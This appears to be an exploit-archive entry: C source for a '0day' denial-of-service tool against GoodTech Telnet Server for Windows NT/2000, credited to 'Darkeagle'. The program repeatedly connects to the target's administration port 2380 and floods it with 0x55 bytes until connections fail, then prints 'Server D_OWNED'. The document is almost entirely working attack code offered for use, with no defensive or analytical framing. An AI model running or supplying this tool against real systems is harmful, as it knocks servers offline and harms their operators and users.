GoodTech Telnet Server for Windows NT/2000.
907e839f9751fef0930dce3be9d9044671372460a81c694c5e4022e8e07d1304
/*
1337 0day D0S exploit for latest version of
GoodTech Telnet Server for Windows NT/2000
bug found by Darkeagle
16.03.05 at 11:30 am
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
int main(int argc, char **argv)
{
int i, err;
unsigned char mex[300000];
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
i = 0;
if ( argc < 2 ) { printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n");
printf(" usage: %s <ip>\n\n", argv[0]);
exit(5);
}
printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n");
for ( ;; ) {
WSAStartup(p,&data);
i++;
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
printf("Server D_OWNED!!!!!!!!!\n", argv[1]);
break;
exit(-1);
}
memset(mex, 0x55, 55555);
printf("%d - Sending %d bytes.....\n", i, strlen(mex));
send(sock, mex , strlen(mex), 0);
closesocket(sock);
WSACleanup();
}
return 0;
}